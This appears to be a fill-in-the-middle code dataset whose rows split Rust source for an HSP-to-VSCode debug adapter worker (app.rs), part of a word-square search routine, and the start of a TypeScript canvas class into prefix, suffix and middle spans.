println!("row_idx {}, col_idx {}", row_idx, col_idx);
}
let cur_code = code_array[at_idx as usize];
if DEBUG_MODE { println!("cur_code {}", cur_code); }
let cur_charset = charset_array[at_idx as usize];
if cur_code == 32 {
code_array[at_idx as usize] = 255u8;
at_idx = at_idx.wrapping_sub(1)
} else if cur_charset.has(cur_code) {
at_idx += 1;
if at_idx == target_idx {
//print_word_square(code_array);
(&mut on_result)(code_array, at_idx);
at_idx -= 1;
} else {
code_array[at_idx as usize] = 255;
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
//println!("row_word {:?}", row_word);
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
//println!("col_word {:?}", row_word);
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
}
}
}
}
| int | identifier_name |
app.rs | use crate::connection;
use crate::debug_adapter_protocol as dap;
use crate::hsp_ext;
use crate::hsprt;
use crate::hspsdk;
use std;
use std::path::PathBuf;
use std::sync::mpsc;
use std::thread;
const MAIN_THREAD_ID: i64 = 1;
const MAIN_THREAD_NAME: &'static str = "main";
fn threads() -> Vec<dap::Thread> {
vec![dap::Thread {
id: MAIN_THREAD_ID,
name: MAIN_THREAD_NAME.to_owned(),
}]
}
/// グローバル変数からなるスコープの変数参照Id
const GLOBAL_SCOPE_REF: i64 = 1;
/// HSP の変数や変数の要素、あるいは変数をまとめるもの (モジュールなど) を指し示すもの。
#[derive(Clone, Debug)]
pub(crate) enum VarPath {
Globals,
Static(usize),
}
/// Variables reference. VSCode が変数や変数要素を指し示すために使う整数値。
pub(crate) type VarRef = i64;
impl VarPath {
pub fn to_var_ref(&self) -> VarRef {
match *self {
VarPath::Globals => 1,
VarPath::Static(i) => 2 + i as i64,
}
}
pub | r_ref(r: VarRef) -> Option<Self> {
match r {
1 => Some(VarPath::Globals),
i if i >= 2 => Some(VarPath::Static((i - 2) as usize)),
_ => None,
}
}
}
#[derive(Clone, Debug)]
pub(crate) struct RuntimeState {
file_name: Option<String>,
file_path: Option<String>,
line: i32,
stopped: bool,
}
/// `Worker` が扱える操作。
#[derive(Clone, Debug)]
pub(crate) enum Action {
/// VSCode との接続が確立したとき。
AfterConnected,
/// VSCode からリクエストが来たとき。
AfterRequestReceived(dap::Msg),
/// assert で停止したとき。
AfterStopped(String, i32),
/// HSP ランタイムが終了する直前。
BeforeTerminating,
AfterDebugInfoLoaded(hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>),
AfterGetVar {
seq: i64,
variables: Vec<dap::Variable>,
},
}
/// `Worker` に処理を依頼するもの。
#[derive(Clone, Debug)]
pub(crate) struct Sender {
sender: mpsc::Sender<Action>,
}
impl Sender {
pub(crate) fn send(&self, action: Action) {
self.sender.send(action).map_err(|e| error!("{:?}", e)).ok();
}
}
/// HSP ランタイムと VSCode の仲介を行う。
pub(crate) struct Worker {
request_receiver: mpsc::Receiver<Action>,
connection_sender: Option<connection::Sender>,
hsprt_sender: Option<hsprt::Sender>,
is_connected: bool,
args: Option<dap::LaunchRequestArgs>,
state: RuntimeState,
debug_info: Option<hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>>,
source_map: Option<hsp_ext::source_map::SourceMap>,
#[allow(unused)]
join_handle: Option<thread::JoinHandle<()>>,
}
impl Worker {
pub fn new(hsprt_sender: hsprt::Sender) -> (Self, Sender) {
let (sender, request_receiver) = mpsc::channel::<Action>();
let app_sender = Sender { sender };
let (connection_worker, connection_sender) = connection::Worker::new(app_sender.clone());
let join_handle = thread::Builder::new()
.name("connection_worker".into())
.spawn(move || connection_worker.run())
.unwrap();
let worker = Worker {
request_receiver,
connection_sender: Some(connection_sender),
hsprt_sender: Some(hsprt_sender),
is_connected: false,
args: None,
state: RuntimeState {
file_path: None,
file_name: None,
line: 1,
stopped: false,
},
debug_info: None,
source_map: None,
join_handle: Some(join_handle),
};
(worker, app_sender)
}
fn is_launch_response_sent(&self) -> bool {
self.args.is_some()
}
pub fn run(mut self) {
self.connection_sender
.as_ref()
.unwrap()
.send(connection::Action::Connect);
loop {
match self.request_receiver.recv() {
Ok(action @ Action::BeforeTerminating) => {
self.handle(action);
break;
}
Ok(action) => {
self.handle(action);
continue;
}
Err(err) => {
error!("[app] {:?}", err);
break;
}
}
}
info!("[app] 終了");
}
/// HSP ランタイムが次に中断しているときにアクションが実行されるように予約する。
/// すでに停止しているときは即座に実行されるように、メッセージを送る。
fn send_to_hsprt(&self, action: hsprt::Action) {
if let Some(sender) = self.hsprt_sender.as_ref() {
sender.send(action, self.state.stopped);
}
}
fn send_response(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: true,
e: response,
}));
}
}
fn send_response_failure(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: false,
e: response,
}));
}
}
fn send_event(&self, event: dap::Event) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Event { e: event }));
}
}
fn send_initialized_event(&self) {
if self.is_connected && self.is_launch_response_sent() {
self.send_event(dap::Event::Initialized);
}
}
fn send_pause_event(&self) {
if self.state.stopped && self.is_launch_response_sent() {
self.send_event(dap::Event::Stopped {
reason: "pause".to_owned(),
thread_id: MAIN_THREAD_ID,
});
}
}
fn on_request(&mut self, seq: i64, request: dap::Request) {
match request {
dap::Request::Launch { args } => {
self.args = Some(args);
self.load_source_map();
self.send_response(seq, dap::Response::Launch);
self.send_initialized_event();
}
dap::Request::SetExceptionBreakpoints { .. } => {
self.send_response(seq, dap::Response::SetExceptionBreakpoints);
self.send_pause_event();
}
dap::Request::ConfigurationDone => {
self.send_response(seq, dap::Response::ConfigurationDone);
}
dap::Request::Threads => {
self.send_response(seq, dap::Response::Threads { threads: threads() })
}
dap::Request::Source { source } => {
match source.and_then(|source| Some(std::fs::read_to_string(source.path?).ok()?)) {
Some(content) => self.send_response(seq, dap::Response::Source { content }),
None => self.send_response_failure(
seq,
dap::Response::Source {
content: "".to_owned(),
},
),
}
}
dap::Request::StackTrace { .. } => {
if self.state.file_path.is_none() {
let file_path = self
.state
.file_name
.as_ref()
.and_then(|file_name| self.resolve_file_path(file_name));
self.state.file_path = file_path;
}
let stack_frames = vec![dap::StackFrame {
id: 1,
name: "main".to_owned(),
line: std::cmp::max(1, self.state.line) as usize,
source: dap::Source {
name: "main".to_owned(),
path: self.state.file_path.to_owned(),
},
}];
self.send_response(seq, dap::Response::StackTrace { stack_frames });
}
dap::Request::Scopes { .. } => {
let scopes = vec![dap::Scope {
name: "グローバル".to_owned(),
variables_reference: GLOBAL_SCOPE_REF,
expensive: true,
}];
self.send_response(seq, dap::Response::Scopes { scopes });
}
dap::Request::Variables {
variables_reference,
} => {
if let Some(var_path) = VarPath::from_var_ref(variables_reference) {
self.send_to_hsprt(hsprt::Action::GetVar { seq, var_path });
}
}
dap::Request::Pause { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STOP as hspsdk::DebugMode,
));
self.send_response(
seq,
dap::Response::Pause {
thread_id: MAIN_THREAD_ID,
},
);
}
dap::Request::Continue { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_RUN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Continue);
self.send_event(dap::Event::Continued {
all_threads_continued: true,
});
self.state.stopped = false;
}
dap::Request::Next { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Next);
}
dap::Request::StepIn { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepIn);
}
dap::Request::StepOut { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepOut);
}
dap::Request::Disconnect { .. } => {
self.send_to_hsprt(hsprt::Action::Disconnect);
}
}
}
fn load_source_map(&mut self) {
if self.source_map.is_some() {
return;
}
let debug_info = match self.debug_info {
None => return,
Some(ref debug_info) => debug_info,
};
let args = match self.args {
None => return,
Some(ref args) => args,
};
let root = PathBuf::from(&args.root);
let mut source_map = hsp_ext::source_map::SourceMap::new(&root);
let file_names = debug_info.file_names();
source_map.add_search_path(PathBuf::from(&args.program).parent());
source_map.add_file_names(
&file_names
.iter()
.map(|name| name.as_str())
.collect::<Vec<&str>>(),
);
self.source_map = Some(source_map);
}
/// ファイル名を絶対パスにする。
/// FIXME: common 以下や 無修飾 include パスに対応する。
fn resolve_file_path(&self, file_name: &String) -> Option<String> {
if file_name == "???" {
return None;
}
let source_map = self.source_map.as_ref()?;
let full_path = source_map.resolve_file_name(file_name)?;
Some(full_path.to_str()?.to_owned())
}
fn handle(&mut self, action: Action) {
debug!("[app] {:?}", action);
match action {
Action::AfterRequestReceived(dap::Msg::Request { seq, e }) => {
self.on_request(seq, e);
}
Action::AfterRequestReceived(_) => {
warn!("[app] リクエストではない DAP メッセージを無視");
}
Action::AfterStopped(file_name, line) => {
let file_path = self.resolve_file_path(&file_name);
self.state = RuntimeState {
file_path,
file_name: Some(file_name),
line,
stopped: true,
};
self.send_pause_event();
}
Action::AfterConnected => {
self.is_connected = true;
self.send_initialized_event();
}
Action::BeforeTerminating => {
self.send_event(dap::Event::Terminated { restart: false });
// サブワーカーを捨てる。
self.hsprt_sender.take();
self.connection_sender.take();
if let Some(_) = self.join_handle.take() {
// NOTE: なぜか終了しないので join しない。
// join_handle.join().unwrap();
}
}
Action::AfterDebugInfoLoaded(debug_info) => {
self.debug_info = Some(debug_info);
self.load_source_map();
}
Action::AfterGetVar { seq, variables } => {
self.send_response(seq, dap::Response::Variables { variables });
}
}
}
}
| fn from_va | identifier_name |
app.rs | use crate::connection;
use crate::debug_adapter_protocol as dap;
use crate::hsp_ext;
use crate::hsprt;
use crate::hspsdk;
use std;
use std::path::PathBuf;
use std::sync::mpsc;
use std::thread;
const MAIN_THREAD_ID: i64 = 1;
const MAIN_THREAD_NAME: &'static str = "main";
fn threads() -> Vec<dap::Thread> {
vec![dap::Thread {
id: MAIN_THREAD_ID,
name: MAIN_THREAD_NAME.to_owned(),
}]
}
/// グローバル変数からなるスコープの変数参照Id
const GLOBAL_SCOPE_REF: i64 = 1;
/// HSP の変数や変数の要素、あるいは変数をまとめるもの (モジュールなど) を指し示すもの。
#[derive(Clone, Debug)]
pub(crate) enum VarPath {
Globals,
Static(usize),
}
/// Variables reference. VSCode が変数や変数要素を指し示すために使う整数値。
pub(crate) type VarRef = i64;
impl VarPath {
pub fn to_var_ref(&self) -> VarRef {
match *self {
VarPath::Globals => 1,
VarPath::Static(i) => 2 + i as i64,
}
}
pub fn from_var_ref(r: VarRef) -> Option<Self> {
match r {
1 => Some(VarPath::Globals),
i if i >= 2 => Some(VarPath::Static((i - 2) as usize)),
_ => None,
}
}
}
#[derive(Clone, Debug)]
pub(crate) struct RuntimeState {
file_name: Option<String>,
file_path: Option<String>,
line: i32,
stopped: bool,
}
/// `Worker` が扱える操作。
#[derive(Clone, Debug)]
pub(crate) enum Action {
/// VSCode との接続が確立したとき。
AfterConnected,
/// VSCode からリクエストが来たとき。
AfterRequestReceived(dap::Msg),
/// assert で停止したとき。
AfterStopped(String, i32),
/// HSP ランタイムが終了する直前。
BeforeTerminating,
AfterDebugInfoLoaded(hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>),
AfterGetVar {
seq: i64,
variables: Vec<dap::Variable>,
},
}
/// `Worker` に処理を依頼するもの。
#[derive(Clone, Debug)]
pub(crate) struct Sender {
sender: mpsc::Sender<Action>,
}
impl Sender {
pub(crate) fn send(&self, action: Action) {
self.sender.send(action).map_err(|e| error!("{:?}", e)).ok();
}
}
/// HSP ランタイムと VSCode の仲介を行う。
pub(crate) struct Worker {
request_receiver: mpsc::Receiver<Action>,
connection_sender: Option<connection::Sender>,
hsprt_sender: Option<hsprt::Sender>,
is_connected: bool,
args: Option<dap::LaunchRequestArgs>,
state: RuntimeState,
debug_info: Option<hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>>,
source_map: Option<hsp_ext::source_map::SourceMap>,
#[allow(unused)]
join_handle: Option<thread::JoinHandle<()>>,
}
impl Worker {
pub fn new(hsprt_sender: hsprt::Sender) -> (Self, Sender) {
let (sender, request_receiver) = mpsc::channel::<Action>();
let app_sender = Sender { sender };
let (connection_worker, connection_sender) = connection::Worker::new(app_sender.clone());
let join_handle = thread::Builder::new()
.name("connection_worker".into())
.spawn(move || connection_worker.run())
.unwrap();
let worker = Worker {
request_receiver,
connection_sender: Some(connection_sender),
hsprt_sender: Some(hsprt_sender),
is_connected: false,
args: None,
state: RuntimeState {
file_path: None,
file_name: None,
line: 1,
stopped: false,
},
debug_info: None,
source_map: None,
join_handle: Some(join_handle),
};
(worker, app_sender)
}
fn is_launch_response_sent(&self) -> bool {
self.args.is_some()
}
pub fn run(mut self) {
self.connection_sender
.as_ref()
.unwrap()
.send(connection::Action::Connect);
loop {
match self.request_receiver.recv() {
Ok(action @ Action::BeforeTerminating) => {
self.handle(action);
break;
}
Ok(action) => {
self.handle(action);
continue;
}
Err(err) => {
error!("[app] {:?}", err);
break;
}
}
}
info!("[app] 終了");
}
/// HSP ランタイムが次に中断しているときにアクションが実行されるように予約する。
/// すでに停止しているときは即座に実行されるように、メッセージを送る。
fn send_to_hsprt(&self, action: hsprt::Action) {
if let Some(sender) = self.hsprt_sender.as_ref() {
sender.send(action, self.state.stopped);
}
}
fn send_response(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: true,
e: response,
}));
}
}
fn send_response_failure(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: false,
e: response,
}));
}
}
fn send_event(&self, event: dap::Event) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Event { e: event }));
}
}
fn send_initialized_event(&self) {
if self.is_connected && self.is_launch_response_sent() {
self.send_event(dap::Event::Initialized);
}
}
fn send_pause_event(&self) {
if self.state.stopped && self.is_launch_response_sent() {
self.send_event(dap::Event::Stopped {
reason: "pause".to_owned(),
thread_id: MAIN_THREAD_ID,
});
}
}
fn on_request(&mut self, seq: i64, request: dap::Request) {
match request {
dap::Request::Launch { args } => {
self.args = Some(args);
self.load_source_map();
self.send_response(seq, dap::Response::Launch);
self.send_initialized_event();
}
dap::Request::SetExceptionBreakpoints { .. } => {
self.send_response(seq, dap::Response::SetExceptionBreakpoints);
self.send_pause_event();
}
dap::Request::ConfigurationDone => {
self.send_response(seq, dap::Response::ConfigurationDone);
}
dap::Request::Threads => {
self.send_response(seq, dap::Response::Threads { threads: threads() })
}
dap::Request::Source { source } => {
match source.and_then(|source| Some(std::fs::read_to_string(source.path?).ok()?)) {
Some(content) => self.send_response(seq, dap::Response::Source { content }),
None => self.send_response_failure(
seq,
dap::Response::Source {
content: "".to_owned(),
},
),
}
}
dap::Request::StackTrace { .. } => {
if self.state.file_path.is_none() {
let file_path = self
.state
.file_name
.as_ref()
.and_then(|file_name| self.resolve_file_path(file_name));
self.state.file_path = file_path;
}
let stack_frames = vec![dap::StackFrame {
id: 1,
name: "main".to_owned(),
line: std::cmp::max(1, self.state.line) as usize,
source: dap::Source {
name: "main".to_owned(),
path: self.state.file_path.to_owned(),
},
}];
self.send_response(seq, dap::Response::StackTrace { stack_frames });
}
dap::Request::Scopes { .. } => {
let scopes = vec![dap::Scope {
name: "グローバル".to_owned(),
variables_reference: GLOBAL_SCOPE_REF,
expensive: true,
}];
self.send_response(seq, dap::Response::Scopes { scopes });
}
dap::Request::Variables {
variables_reference,
} => {
if let Some(var_path) = VarPath::from_var_ref(variables_reference) {
self.send_to_hsprt(hsprt::Action::GetVar { seq, var_path });
}
}
dap::Request::Pause { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STOP as hspsdk::DebugMode,
));
self.send_response(
seq,
dap::Response::Pause {
thread_id: MAIN_THREAD_ID,
},
);
}
dap::Request::Continue { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_RUN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Continue);
self.send_event(dap::Event::Continued {
all_threads_continued: true,
});
self.state.stopped = false;
}
dap::Request::Next { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Next);
}
dap::Request::StepIn { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepIn);
}
dap::Request::StepOut { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepOut);
}
dap::Request::Disconnect { .. } => {
self.send_to_hsprt(hsprt::Action::Disconnect);
}
}
}
fn load_source_map(&mut self) {
if self.source_map.is_some() {
return;
}
let debug_info = match self.debug_info {
None => return,
Some(ref debug_info) => debug_info,
};
let args = match self.args {
None => return,
Some(ref args) => args,
};
let root = PathBuf::from(&args.root);
let mut source_map = hsp_ext::source_map::SourceMap::new(&root);
let file_names = debug_info.file_names();
source_map.add_search_path(PathBuf::from(&args.program).parent());
source_map.add_file_names(
&file_names
.iter()
.map(|name| name.as_str())
.collect::<Vec<&str>>(),
);
self.source_map = Some(source_map);
}
/// ファイル名を絶対パスにする。
/// FIXME: common 以下や 無修飾 include パスに対応する。
fn resolve_file_path(&self, file_name: &String) -> Option<String> {
if file_name == "???" {
return None;
}
let source_map = self.source_map.as_ref()?;
let full_path = source_map.resolve_file_name(file_name)?;
Some(full_path.to_str()?.to_owned())
}
fn handle(&mut self, action: Action) {
debug!("[app] {:?}", action);
match action {
Action::AfterRequestReceived(dap::Msg::Request { seq, e }) => {
self.on_request(seq, e);
}
Action::AfterRequestReceived(_) => | {
file_path,
file_name: Some(file_name),
line,
stopped: true,
};
self.send_pause_event();
}
Action::AfterConnected => {
self.is_connected = true;
self.send_initialized_event();
}
Action::BeforeTerminating => {
self.send_event(dap::Event::Terminated { restart: false });
// サブワーカーを捨てる。
self.hsprt_sender.take();
self.connection_sender.take();
if let Some(_) = self.join_handle.take() {
// NOTE: なぜか終了しないので join しない。
// join_handle.join().unwrap();
}
}
Action::AfterDebugInfoLoaded(debug_info) => {
self.debug_info = Some(debug_info);
self.load_source_map();
}
Action::AfterGetVar { seq, variables } => {
self.send_response(seq, dap::Response::Variables { variables });
}
}
}
}
| {
warn!("[app] リクエストではない DAP メッセージを無視");
}
Action::AfterStopped(file_name, line) => {
let file_path = self.resolve_file_path(&file_name);
self.state = RuntimeState | identifier_body |
app.rs | use crate::connection;
use crate::debug_adapter_protocol as dap;
use crate::hsp_ext;
use crate::hsprt;
use crate::hspsdk;
use std;
use std::path::PathBuf;
use std::sync::mpsc;
use std::thread;
const MAIN_THREAD_ID: i64 = 1;
const MAIN_THREAD_NAME: &'static str = "main";
fn threads() -> Vec<dap::Thread> {
vec![dap::Thread {
id: MAIN_THREAD_ID,
name: MAIN_THREAD_NAME.to_owned(),
}]
}
/// グローバル変数からなるスコープの変数参照Id
const GLOBAL_SCOPE_REF: i64 = 1;
/// HSP の変数や変数の要素、あるいは変数をまとめるもの (モジュールなど) を指し示すもの。
#[derive(Clone, Debug)]
pub(crate) enum VarPath {
Globals,
Static(usize),
}
/// Variables reference. VSCode が変数や変数要素を指し示すために使う整数値。
pub(crate) type VarRef = i64;
impl VarPath {
pub fn to_var_ref(&self) -> VarRef {
match *self {
VarPath::Globals => 1,
VarPath::Static(i) => 2 + i as i64,
}
}
pub fn from_var_ref(r: VarRef) -> Option<Self> {
match r {
1 => Some(VarPath::Globals),
i if i >= 2 => Some(VarPath::Static((i - 2) as usize)),
_ => None,
}
}
}
#[derive(Clone, Debug)]
pub(crate) struct RuntimeState {
file_name: Option<String>,
file_path: Option<String>,
line: i32,
stopped: bool,
}
/// `Worker` が扱える操作。
#[derive(Clone, Debug)]
pub(crate) enum Action {
/// VSCode との接続が確立したとき。
AfterConnected,
/// VSCode からリクエストが来たとき。
AfterRequestReceived(dap::Msg),
/// assert で停止したとき。
AfterStopped(String, i32),
/// HSP ランタイムが終了する直前。
BeforeTerminating,
AfterDebugInfoLoaded(hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>),
AfterGetVar {
seq: i64,
variables: Vec<dap::Variable>,
},
}
/// `Worker` に処理を依頼するもの。
#[derive(Clone, Debug)]
pub(crate) struct Sender {
sender: mpsc::Sender<Action>,
}
impl Sender {
pub(crate) fn send(&self, action: Action) {
self.sender.send(action).map_err(|e| error!("{:?}", e)).ok();
}
}
/// HSP ランタイムと VSCode の仲介を行う。
pub(crate) struct Worker {
request_receiver: mpsc::Receiver<Action>,
connection_sender: Option<connection::Sender>,
hsprt_sender: Option<hsprt::Sender>,
is_connected: bool,
args: Option<dap::LaunchRequestArgs>,
state: RuntimeState,
debug_info: Option<hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>>,
source_map: Option<hsp_ext::source_map::SourceMap>,
#[allow(unused)]
join_handle: Option<thread::JoinHandle<()>>,
}
impl Worker {
pub fn new(hsprt_sender: hsprt::Sender) -> (Self, Sender) {
let (sender, request_receiver) = mpsc::channel::<Action>();
let app_sender = Sender { sender };
let (connection_worker, connection_sender) = connection::Worker::new(app_sender.clone());
let join_handle = thread::Builder::new()
.name("connection_worker".into())
.spawn(move || connection_worker.run())
.unwrap();
let worker = Worker {
request_receiver,
connection_sender: Some(connection_sender),
hsprt_sender: Some(hsprt_sender),
is_connected: false,
args: None,
state: RuntimeState {
file_path: None,
file_name: None,
line: 1,
stopped: false,
},
debug_info: None,
source_map: None,
join_handle: Some(join_handle),
};
(worker, app_sender)
}
fn is_launch_response_sent(&self) -> bool {
self.args.is_some()
}
pub fn run(mut self) {
self.connection_sender
.as_ref()
.unwrap()
.send(connection::Action::Connect);
loop {
match self.request_receiver.recv() {
Ok(action @ Action::BeforeTerminating) => {
self.handle(action);
break;
}
Ok(action) => {
self.handle(action);
continue;
}
Err(err) => {
error!("[app] {:?}", err);
break;
}
}
}
info!("[app] 終了");
}
/// HSP ランタイムが次に中断しているときにアクションが実行されるように予約する。
/// すでに停止しているときは即座に実行されるように、メッセージを送る。
fn send_to_hsprt(&self, action: hsprt::Action) {
if let Some(sender) = self.hsprt_sender.as_ref() {
sender.send(action, self.state.stopped);
}
}
fn send_response(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: true,
e: response,
}));
}
}
fn send_response_failure(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: false,
e: response,
}));
}
}
fn send_event(&self, event: dap::Event) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Event { e: event }));
}
}
fn send_initialized_event(&self) {
if self.is_connected && self.is_launch_response_sent() {
self.send_event(dap::Event::Initialized);
}
}
fn send_pause_event(&self) {
if self.state.stopped && self.is_launch_response_sent() {
self.send_event(dap::Event::Stopped {
reason: "pause".to_owned(),
thread_id: MAIN_THREAD_ID,
});
}
}
fn on_request(&mut self, seq: i64, request: dap::Request) {
match request {
dap::Request::Launch { args } => {
self.args = Some(args);
self.load_source_map();
self.send_response(seq, dap::Response::Launch);
self.send_initialized_event();
}
dap::Request::SetExceptionBreakpoints { .. } => {
self.send_response(seq, dap::Response::SetExceptionBreakpoints);
self.send_pause_event();
}
dap::Request::ConfigurationDone => {
self.send_response(seq, dap::Response::ConfigurationDone);
}
dap::Request::Threads => {
self.send_response(seq, dap::Response::Threads { threads: threads() })
}
dap::Request::Source { source } => {
match source.and_then(|source| Some(std::fs::read_to_string(source.path?).ok()?)) {
Some(content) => self.send_response(seq, dap::Response::Source { content }),
None => self.send_response_failure(
seq,
dap::Response::Source {
content: "".to_owned(),
},
),
}
}
dap::Request::StackTrace { .. } => {
if self.state.file_path.is_none() {
let file_path = self
.state
.file_name
.as_ref()
.and_then(|file_name| self.resolve_file_path(file_name));
self.state.file_path = file_path;
}
let stack_frames = vec![dap::StackFrame {
id: 1,
name: "main".to_owned(),
line: std::cmp::max(1, self.state.line) as usize,
source: dap::Source {
name: "main".to_owned(),
path: self.state.file_path.to_owned(),
},
}];
self.send_response(seq, dap::Response::StackTrace { stack_frames });
}
dap::Request::Scopes { .. } => {
let scopes = vec![dap::Scope {
name: "グローバル".to_owned(),
variables_reference: GLOBAL_SCOPE_REF,
expensive: true,
}];
self.send_response(seq, dap::Response::Scopes { scopes });
}
dap::Request::Variables {
variables_reference,
} => {
if let Some(var_path) = VarPath::from_var_ref(variables_reference) {
self.send_to_hsprt(hsprt::Action::GetVar { seq, var_path });
}
}
dap::Request::Pause { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STOP as hspsdk::DebugMode,
));
self.send_response(
seq,
dap::Response::Pause {
thread_id: MAIN_THREAD_ID,
},
);
}
dap::Request::Continue { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_RUN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Continue);
self.send_event(dap::Event::Continued {
all_threads_continued: true,
});
self.state.stopped = false;
}
dap::Request::Next { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Next);
}
dap::Request::StepIn { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepIn);
}
dap::Request::StepOut { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepOut);
}
dap::Request::Disconnect { .. } => {
self.send_to_hsprt(hsprt::Action::Disconnect);
}
}
}
fn load_source_map(&mut self) {
if self.source_map.is_some() {
return;
}
let debug_info = match self.debug_info {
None => return,
Some(ref debug_info) => debug_info,
};
let args = match self.args {
None => return,
Some(ref args) => args,
};
let root = PathBuf::from(&args.root);
let mut source_map = hsp_ext::source_map::SourceMap::new(&root); | .iter()
.map(|name| name.as_str())
.collect::<Vec<&str>>(),
);
self.source_map = Some(source_map);
}
/// ファイル名を絶対パスにする。
/// FIXME: common 以下や 無修飾 include パスに対応する。
fn resolve_file_path(&self, file_name: &String) -> Option<String> {
if file_name == "???" {
return None;
}
let source_map = self.source_map.as_ref()?;
let full_path = source_map.resolve_file_name(file_name)?;
Some(full_path.to_str()?.to_owned())
}
fn handle(&mut self, action: Action) {
debug!("[app] {:?}", action);
match action {
Action::AfterRequestReceived(dap::Msg::Request { seq, e }) => {
self.on_request(seq, e);
}
Action::AfterRequestReceived(_) => {
warn!("[app] リクエストではない DAP メッセージを無視");
}
Action::AfterStopped(file_name, line) => {
let file_path = self.resolve_file_path(&file_name);
self.state = RuntimeState {
file_path,
file_name: Some(file_name),
line,
stopped: true,
};
self.send_pause_event();
}
Action::AfterConnected => {
self.is_connected = true;
self.send_initialized_event();
}
Action::BeforeTerminating => {
self.send_event(dap::Event::Terminated { restart: false });
// サブワーカーを捨てる。
self.hsprt_sender.take();
self.connection_sender.take();
if let Some(_) = self.join_handle.take() {
// NOTE: なぜか終了しないので join しない。
// join_handle.join().unwrap();
}
}
Action::AfterDebugInfoLoaded(debug_info) => {
self.debug_info = Some(debug_info);
self.load_source_map();
}
Action::AfterGetVar { seq, variables } => {
self.send_response(seq, dap::Response::Variables { variables });
}
}
}
} | let file_names = debug_info.file_names();
source_map.add_search_path(PathBuf::from(&args.program).parent());
source_map.add_file_names(
&file_names | random_line_split |
CanvasState.ts | import Shape from './Shape'
import * as $ from 'jquery'
export default class CanvasState {
canvas:any;
width:number;
height:number;
ctx:any;
stylePaddingLeft:number;
stylePaddingTop:number;
styleBorderLeft:number;
styleBorderTop:number;
htmlTop : number;
htmlLeft:number;
valid:boolean;
alert:boolean;
dragging:boolean;
drawing:boolean;
selection: any;
dragoffx:number;
dragoffy:number;
drawingoffx:number;
drawingoffy:number;
shapes:Array<Shape>;
selectionColor:string;
selectionWidth:number;
interval:number;
imageObj:any;
border:number;
scale:number;
handleParentScroll:boolean;
onAddShape: (shape:Shape) => void;
constructor(canvas) {
// **** First some setup! ****
this.canvas = canvas;
this.width = canvas.width;
this.height = canvas.height;
this.ctx = canvas.getContext('2d');
